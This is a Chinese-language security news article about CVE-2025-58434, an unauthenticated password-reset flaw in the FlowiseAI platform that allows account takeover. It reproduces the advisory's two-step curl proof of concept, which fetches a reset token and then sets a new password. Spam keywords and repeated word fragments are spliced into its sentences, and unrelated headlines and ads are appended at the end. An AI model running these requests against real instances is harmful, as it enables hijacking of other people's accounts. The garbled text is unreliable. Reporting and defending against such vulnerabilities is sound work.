开源生成式AI开发平台FlowiseAI(广泛用于构建AI代理和LLM工作流)近日被发现存在高危漏洞 ,漏洞攻击者可在未认证状态下接管云环境和本地部署环境中的高管任意账户。
该漏洞编号为CVE-2025-58434,危漏CVSS评分为9.8分,可导源于平台的致完密码重置机制。安全公告指出:"Flowise的服务器租用全账密码找回端点(/api/v1/account/forgot-password)在未经认证或验证的情况下,直接返回包含有效密码重置临时令牌(tempToken)在内的户接敏感信息 。攻击者可借此为任意用户生成重置令牌并直接修改密码,漏洞最终实现完全账户接管(ATO)。高管" 技术分析该漏洞端点仅需输入邮箱地址即可触发响应,建站模板危漏但API并未通过邮件安全发送重置链接 ,可导而是致完直接返回以下敏感信息: 用户ID、姓名、全账邮箱及凭证哈希值账户状态和时间戳有效的户接密码重置临时令牌及其有效期安全公告特别强调:"攻击者获取tempToken后,可立即在/api/v1/account/reset-password端点重复使用,源码下载漏洞无需邮件验证或用户交互即可重置目标账户密码 。"由于仅需获知受害者邮箱(通常可猜测或公开获取) ,未认证攻击者即可接管包括管理员在内的任意账户。 攻击复现公告提供了完整的攻击链复现步骤 : (1) 获取重置令牌 复制curl -i -X POST https://<target>/api/v1/account/forgot-password \ -H "Content-Type: application/json" \ -d { "user":{ "email":"victim@example.com"}}1.2.3.响应报文将包含有效tempToken (2) 利用令牌重置密码 复制curl -i -X POST https://<target>/api/v1/account/reset-password \ -H "Content-Type: application/json" \ -d { "user":{ "email":"victim@example.com", "tempToken":"<redacted-tempToken>", "password":"NewSecurePassword123!" } }1.2.3.当返回200 OK状态码时 ,受害者密码即被修改 风险影响该漏洞被归类为"认证绕过/不安全的免费模板直接对象引用",具体影响包括: 完全账户接管(含高权限管理员账户)数据泄露与身份冒用(可访问组织敏感资产)无需用户交互(大幅降低攻击门槛)同时影响云环境和本地部署(扩大威胁面)公告警告称:"由于攻击无需前置条件或用户交互,该漏洞极有可能被大规模利用。" 缓解措施目前FlowiseAI尚未发布补丁 ,3.0.5之前的所有版本均受影响。建议采取以下临时防护措施 : 禁止API响应返回重置令牌等敏感信息确保令牌仅通过安全邮件渠道传递返回通用成功消息以避免用户枚举实施单次有效、亿华云短生命期且绑定请求源的令牌记录并监控所有密码重置请求为敏感账户启用多因素认证(MFA)在官方补丁发布前,管理员需严格实施临时解决方案 ,限制漏洞端点暴露,并密切监控重置操作。正如公告所述:"该漏洞实质上允许任何未认证攻击者通过请求目标邮箱的重置令牌 ,云计算接管包括管理员在内的任意账户 。" |
Realtek 蓝牙安全连接配对漏洞可导致攻击者发起拒绝服务攻击企业数据库险遭百亿损失,瑞数DDR全周期防护破解“暗雷”阴影探究GeForce980MZ(颠覆视觉体验的游戏级显卡)微软紧急修复高危蠕虫级 RCE 漏洞,威胁全网 Windows 系统2022年及以后的四个数据中心提示将安全内建于开发流程中:威胁应对分步指南(Build Security In) - 上戴尔Latitude 5420商务笔记本 优质体验 胜任多种办公需求企业通过谈判策略降低赎金支付的实战经验GitHub成为欧洲恶意软件传播的首选平台福布斯:如何确保客户的数据安全企业服务器香港物理机网站建设云服务器b2b信息平台亿华云源码库